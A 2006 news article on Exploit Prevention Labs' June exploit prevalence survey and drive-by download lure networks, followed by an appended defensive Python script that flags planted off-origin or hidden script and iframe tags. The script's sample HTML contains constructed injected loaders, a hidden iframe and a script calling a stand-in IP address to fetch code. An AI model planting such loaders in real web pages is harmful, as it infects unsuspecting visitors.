
News by WebKnowHow


Exploit Prevention Labs Releases Exploit Prevalence Survey for Month of June

 

WebKnowHow
Tuesday, July 11, 2006; 03:15 AM

Exploit Prevention Labs, developer of anti-exploit protection, released findings for its Exploit Prevalence Survey for the month of June. The Exploit Prevalence Survey, which debuted on June 8, is a monthly survey to measure the top web-borne exploits based on real-world prevalence data.

The survey results are derived from automated reports submitted by users of Exploit Prevention Labs’ SocketShield anti-exploit software in addition to information captured from the company’s network of hunting-pots. A free trial download of the SocketShield software is available at http://www.explabs.com.

Among the key findings, WebAttacker-generated exploits rose to the number one position, accounting for 32 percent of reported exploits in June compared to 24 percent in May. The Windows Metafile (WMF) exploit, which appeared and spread rapidly at the end of 2005, dropped from number one in May to number four, accounting for only 15 percent of reported exploits in June compared to 33 percent in May.

According to Roger Thompson, CTO of Exploit Prevention Labs and author of the survey, the WebAttacker script, which criminals use to distribute and launch exploits, may be increasing in popularity because it requires little technical knowledge for the criminals to operate, while the WMF exploit may have declined because users have now had six months to patch for it.

“We are keeping a particularly close eye on the Web Attacker-generated MDAC exploits, which are actually more prevalent than is reflected by the data,” adds Thompson. “We've found four separate MDAC scripts so far and fully expect that number to increase over the coming weeks.”

The overall prevalence of exploits, according to Thompson, remained fairly steady in June compared to May, primarily because there have been few major software vulnerabilities discovered since March of this year. But this current calm should not be cause for complacency.

Despite the relatively unchanged landscape, Thompson believes the cyber criminals are prepared to take advantage of the next big vulnerability discovery. “There are multiple exploit distribution networks on the web that control tens of thousands of “lure” web sites, all of which are being used to distribute malware by drive-by download to unpatched PCs,” says Thompson. “Once the next big vulnerability is discovered and an exploit is written for it, the bad guys can quickly introduce it to their networks.”

In a further development, July has been designated a “Month of Browser Bugs” by security researcher, HD Moore. Through his Metasploit project, he has been stockpiling browser bugs, and is planning to release one each day for the month of July. He says that most will be for Internet Explorer, with a handful for other browsers. Thompson said, “The first few seem to be nothing more than browser crashers, but it will be interesting to see how many of them end up being exploitable, and if they are, how many end up being used by the bad guys.”

What are Exploits?

Exploits are code that takes advantage of a security vulnerability in commonly used software, such as the Windows operating system or a web browser, to run an attacker's code on the victim's machine; the malware that the exploit then installs is its payload. Unlike traditional malware such as viruses or trojans, which were usually created by thrill-seeking individuals trying to cause chaos, exploits are part of a growing category of malicious and frequently for-profit tools used by international criminal cyber gangs.

Zero-day exploits, an especially dangerous form of exploit, target vulnerabilities for which no patch is yet available. Once a vulnerability is discovered, it typically takes the software developer anywhere from three weeks to six months to ship a patch, because patches must be rigorously tested to ensure they do not cause other system instabilities. Exploit developers, on the other hand, have no such concerns about quality assurance or application conflicts, and can release their code very quickly, often the same day a vulnerability becomes known.

Most exploit infections occur through what is known as a drive-by download, in which malicious code is downloaded onto a user's computer without their knowledge or consent. This happens the moment the user visits a compromised web site, which may well appear completely innocuous. The payload, usually in the form of a rootkit, then exposes the user to damage from spyware, keyloggers, and other crimeware.

Many Internet users mistakenly believe as long as they’re not visiting pornographic or illegal file sharing sites, they’re safe from exploits. The truth, however, is that even trusted web sites cannot always be trusted.

Similar to the business model employed by spammers, the exploit distributors use a tiered distribution system, usually composed of a single master exploit server that controls a large network of servers hosting innocent-seeming web sites that in turn act as lures for unsuspecting visitors. Exploit Prevention Labs has discovered numerous exploit distribution networks in which up to 20,000 trusted and legitimate web sites had been hacked by cyber criminals who were using those sites to spread exploits.

When a visitor loads one of these sites, the malicious code planted on the page silently connects to an exploit server operated by the criminals, which attempts to deliver the drive-by download to the visitor's machine. If the visitor's operating system or browser lacks the patch for the vulnerability being exploited, the machine is infected.
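The mechanism described in the last two paragraphs gives a site owner something concrete to check for: a page that has been turned into a lure carries planted code that fetches content from a server the site owner never configured. The following is an added example written for this page, not Exploit Prevention Labs' or SocketShield's code. It assumes the planted code takes the form of a script or iframe tag whose src points at a host other than the site's own (the article does not say what form the code takes); the sample page, its hostnames and the 203.0.113.7 address are constructed for illustration.

```python
"""Flag planted off-origin loaders (script/iframe tags) in a web page.

Added example for the drive-by-download description above; it is not
code from the article or from Exploit Prevention Labs. Assumption: the
injected lure code is a <script src=...> or <iframe src=...> that pulls
content from a host the site owner does not control.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a site-local script, a legitimate CDN script,
# then two planted loaders pointing at a raw IP address. All names and
# addresses here are made up for the example.
SAMPLE_HTML = """
<html><head><title>Acme Widgets</title>
<script src="/js/menu.js"></script>
<script src="http://cdn.acme-widgets.example/lib.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0"
        style="display:none"></iframe>
<script src="http://203.0.113.7/x.js"></script>
</body></html>
"""


class LoaderFinder(HTMLParser):
    """Collect every script/iframe src and note whether an iframe is hidden."""

    def __init__(self):
        super().__init__()
        self.loads = []  # list of (tag, src, hidden)

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = dict(attrs)  # HTMLParser lowercases attribute names
        src = a.get("src")
        if not src:
            return
        hidden = False
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            zero_size = (a.get("width"), a.get("height")) == ("0", "0")
            hidden = ("display:none" in style
                      or "visibility:hidden" in style
                      or zero_size)
        self.loads.append((tag, src, hidden))


def host_of(src):
    """Hostname of an absolute URL, or None for a site-relative path."""
    host = urlparse(src).hostname
    return host.lower() if host else None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_suspicious_loads(html, page_host, allowed_hosts=()):
    """Return script/iframe loads that are off-origin or hidden.

    page_host is the site's own hostname; allowed_hosts lists third-party
    hosts the owner knowingly uses (CDNs, ad networks). Each finding is a
    dict with the tag, src, host and the reasons it was flagged.
    """
    finder = LoaderFinder()
    finder.feed(html)
    allowed = {h.lower() for h in allowed_hosts} | {page_host.lower()}
    findings = []
    for tag, src, hidden in finder.loads:
        host = host_of(src)
        reasons = []
        if host is not None and host not in allowed:
            reasons.append("off-origin")
            if _is_ip_literal(host):
                reasons.append("ip-literal")
        if hidden:
            reasons.append("hidden-iframe")
        if reasons:
            findings.append({"tag": tag, "src": src,
                             "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_loads(SAMPLE_HTML, "www.acme-widgets.example",
                                   ["cdn.acme-widgets.example"]):
        print(f["tag"], f["src"], ",".join(f["reasons"]))
```

The allow-list is the important part: legitimate pages routinely load scripts from CDNs and advertising networks, so "off-origin" alone is not proof of compromise. A zero-sized or display:none iframe pointing at a host the owner does not recognise, or at a bare IP address, is the pattern worth pulling the server logs for.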
